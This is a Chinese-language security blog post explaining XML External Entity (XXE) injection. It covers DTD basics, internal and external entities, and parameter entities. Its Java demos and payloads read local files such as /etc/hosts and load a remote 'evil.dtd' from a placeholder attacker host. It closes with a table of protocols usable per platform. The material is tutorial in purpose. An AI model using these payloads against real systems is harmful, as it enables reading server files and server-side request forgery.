<!DOCTYPE html><html lang="zh"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title>XXE | Hurn's Blog</title><meta name="description" content="XXE - Hurn"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/theme.css"><link rel="search" type="application/opensearchdescription+xml" href="/atom.xml" title="Hurn's Blog"><meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head><body><div class="wrap"><header><h1 class="branding"><a href="/" title="Hurn's Blog"><img class="logo-image" src="/logo.png" alt="logo"></a></h1><ul class="nav nav-list"><li class="nav-list-item"><a class="nav-list-link" href="/" target="_self">HOME</a></li><li class="nav-list-item"><a class="nav-list-link" href="/archives" target="_self">ARCHIVES</a></li><li class="nav-list-item"><a class="nav-list-link" href="https://github.com/Dreyer" target="_blank">GITHUB</a></li><li class="nav-list-item"><a class="nav-list-link" href="/atom.xml" target="_self">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">XXE</h1><div class="post-info"><a></a>2022-06-20</div><div class="post-content"><h1 id="0x1-XML文档"><a href="#0x1-XML文档" class="headerlink" title="0x1. XML文档"></a>0x1. XML文档</h1><p>XML是一种数据格式，类似于JSON，在Java中较为流行，在XML文档结构中包括XML文档声明、DTD定义文档的格式、XML文档元素三部分：</p>
<ul>
<li>XML文档描述:</li>
</ul>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot;?&gt;
</code></pre>
<ul>
<li>DTD，定义文档的格式:</li>
</ul>
<pre><code class="xml-dtd">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
&lt;!ELEMENT message (receiver ,sender ,header ,msg)&gt;
&lt;!ELEMENT receiver (#PCDATA)&gt;
&lt;!ELEMENT sender (#PCDATA)&gt;
&lt;!ELEMENT header (#PCDATA)&gt;
&lt;!ELEMENT msg (#PCDATA)&gt;
]&gt;
</code></pre>
<blockquote>
<p>这里面<strong>DOCTYPE</strong>定义 message 为xml文档的根节点， <strong>ELEMENT</strong> 定义实体，message根节点拥有 receive、sender、header、msg四个字节点<br><strong>括号</strong>中为节点的数据格式，**#PCDATA **表示为字符数据，会将一些特殊字符进行转码                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              </p>
</blockquote>
<ul>
<li>XML文档元素</li>
</ul>
<pre><code class="xml">&lt;message&gt;
  &lt;receiver&gt;Myself&lt;/receiver&gt;
  &lt;sender&gt;Someone&lt;/sender&gt;
  &lt;header&gt;TheReminder&lt;/header&gt;
  &lt;msg&gt;This is an amazing book&lt;/msg&gt;
&lt;/message&gt;
</code></pre>
<h1 id="0x2-XXE-基础"><a href="#0x2-XXE-基础" class="headerlink" title="0x2. XXE 基础"></a>0x2. XXE 基础</h1><p>XXE(XML External Entity Injection)，也就是 XML外部实体注入，在DTD中定义的实体（可以理解为在xml中定义变量），分为内部实体和外部实体，实体是一种对资源或另一个实体的引用，它的作用在于对程序的xml文档中创建一种动态的资源引用，对引用的资源更新时会自动对XML文档更新，所以这种动态引用在方便开发者的同时也有了被攻击的入口。</p>
<p><strong>实体根据引用资源的不同分为，内部实体和外部实体</strong></p>
<ul>
<li>内部实体，引用内部定义的资源</li>
</ul>
<pre><code class="xml">&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;

&lt;!ENTITY xxe &quot;test&quot;&gt;
</code></pre>
<pre><code class="java">public class DocumentXXE &#123;
    public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException &#123;
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder documentBuilder = dbf.newDocumentBuilder();

        String str2 = &quot;&lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;ISO-8859-1\&quot;?&gt;\n&quot; +
                &quot;&lt;!DOCTYPE foo [\n&quot; +
                &quot;&lt;!ELEMENT foo ANY &gt;\n&quot; +
                &quot;&lt;!ENTITY xxe \&quot;test\&quot; &gt;]&gt;&quot; +
                &quot;&lt;creds&gt;\n&quot; +
                &quot;&lt;user&gt;&amp;xxe;&lt;/user&gt;\n&quot; +
                &quot;&lt;pass&gt;mypass&lt;/pass&gt;\n&quot; +
                &quot;&lt;/creds&gt;&quot;;

        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(str2.getBytes(StandardCharsets.UTF_8));
        Document document = documentBuilder.parse(byteArrayInputStream);
        Element rootElement = document.getDocumentElement();
        NodeList childNodes = rootElement.getChildNodes();
        for( int i = 0 ; i &lt;childNodes.getLength(); i++)&#123;
            Node item = childNodes.item(i);
            System.out.println(item.getNodeName());
            System.out.println(item.getTextContent());
        &#125;


    &#125;
&#125;
</code></pre>
<blockquote>
<ul>
<li><code>&lt;!ELEMENT foo ANY&gt; </code>表示在foo这个根节点下可以写任意类型的字节点 </li>
<li>在xml文档中使用<code>&amp;</code> 表示引用实体</li>
</ul>
</blockquote>
<p><img src="/2022/06/20/Java/XXE/image-20220621084052525.png" alt="image-20220621084052525"></p>
<ul>
<li>外部实体，引用外部资源</li>
</ul>
<pre><code class="xml">&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL&quot;&gt;

&lt;!ENTITY xxe SYSTEM &quot;file:///etc/hosts&quot;&gt;
</code></pre>
<pre><code class="java">public class DocumentXXE &#123;
    public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException &#123;
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder documentBuilder = dbf.newDocumentBuilder();

       String str3 = &quot;&lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;ISO-8859-1\&quot;?&gt;\n&quot; +
                &quot;&lt;!DOCTYPE foo [\n&quot; +
                &quot;&lt;!ELEMENT foo ANY &gt;\n&quot; +
                &quot;&lt;!ENTITY xxe SYSTEM \&quot;file:///etc/hosts\&quot; &gt;]&gt;\n&quot; +
                &quot;&lt;creds&gt;\n&quot; +
                &quot;    &lt;user&gt;&amp;xxe;&lt;/user&gt;\n&quot; +
                &quot;    &lt;pass&gt;mypass&lt;/pass&gt;\n&quot; +
                &quot;&lt;/creds&gt;&quot;;


        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(str3.getBytes(StandardCharsets.UTF_8));
        Document document = documentBuilder.parse(byteArrayInputStream);
        Element rootElement = document.getDocumentElement();
        NodeList childNodes = rootElement.getChildNodes();
        for( int i = 0 ; i &lt;childNodes.getLength(); i++)&#123;
            Node item = childNodes.item(i);
            System.out.println(item.getNodeName());
            System.out.println(item.getTextContent());
        &#125;
    &#125;
&#125;
</code></pre>
<p><img src="/2022/06/20/Java/XXE/image-20220621090039066.png" alt="image-20220621090039066"></p>
<p><strong>根据使用的不同分为通用实体和参数实体</strong></p>
<ul>
<li>通用实体，就如上面的两种，通用实体在DTD中定义，在XML文档中使用<code>&amp;</code>引用</li>
<li>参数实体，参数实体在DTD中定义，<strong>只能在DTD中使用</strong>，在XML文档中使用<code>%</code>引用</li>
</ul>
<pre><code class="xml-dtd">&lt;!ENTITY % an-element &quot;&lt;!ELEMENT mytag (subtag)&gt;&quot;&gt; 
&lt;!ENTITY % remote-dtd SYSTEM &quot;http://somewhere.example.org/remote.dtd&quot;&gt; 
%an-element; %remote-dtd;
</code></pre>
<p><strong>XXE中数据特殊字符问题</strong></p>
<p>Payload:</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; 
&lt;!DOCTYPE roottag [
&lt;!ENTITY % start &quot;&lt;![CDATA[&quot;&gt;   
&lt;!ENTITY % goodies SYSTEM &quot;file:///d:/test.txt&quot;&gt;  
&lt;!ENTITY % end &quot;]]&gt;&quot;&gt;  
&lt;!ENTITY % dtd SYSTEM &quot;http://ip/evil.dtd&quot;&gt; 
%dtd; ]&gt; 

&lt;roottag&gt;&amp;all;&lt;/roottag&gt;
</code></pre>
<p>dtd:</p>
<pre><code class="xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; 
&lt;!ENTITY all &quot;%start;%goodies;%end;&quot;&gt;
</code></pre>
<h1 id="0x3-XXE攻击方式"><a href="#0x3-XXE攻击方式" class="headerlink" title="0x3. XXE攻击方式"></a>0x3. XXE攻击方式</h1><ul>
<li>读取文件</li>
<li>SSRF</li>
<li>上传文件</li>
</ul>
<p>XXE 利用协议</p>
<table>
<thead>
<tr>
<th align="center"></th>
<th align="center"></th>
<th align="center"></th>
<th align="center"></th>
</tr>
</thead>
<tbody><tr>
<td align="center">LIBXML2</td>
<td align="center">PHP</td>
<td align="center">JAVA</td>
<td align="center">.NET</td>
</tr>
<tr>
<td align="center">file</td>
<td align="center">file</td>
<td align="center">http</td>
<td align="center">file</td>
</tr>
<tr>
<td align="center">http</td>
<td align="center">http</td>
<td align="center">https</td>
<td align="center">http</td>
</tr>
<tr>
<td align="center">ftp</td>
<td align="center">ftp</td>
<td align="center">ftp</td>
<td align="center">https</td>
</tr>
<tr>
<td align="center"></td>
<td align="center">php</td>
<td align="center">file</td>
<td align="center">ftp</td>
</tr>
<tr>
<td align="center"></td>
<td align="center">compress.zlib</td>
<td align="center">jar*</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">compress.bzip2</td>
<td align="center">netdoc*</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">data</td>
<td align="center">mailto</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">glob</td>
<td align="center">gopher *</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">phar</td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<h1 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h1></div></article></div></main><footer><div class="paginator"><a class="prev" href="/2022/07/03/Go%E5%B9%B6%E5%8F%91/">prev</a><a class="next" href="/2022/06/17/JWT/">next</a></div><div class="copyright"><p>&copy; 2023 <a href="http://example.com">Hurn</a>.<br>Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/Dreyer/hexo-theme-artemis" target="_blank">Artemis</a>.</p></div></footer></div></body></html>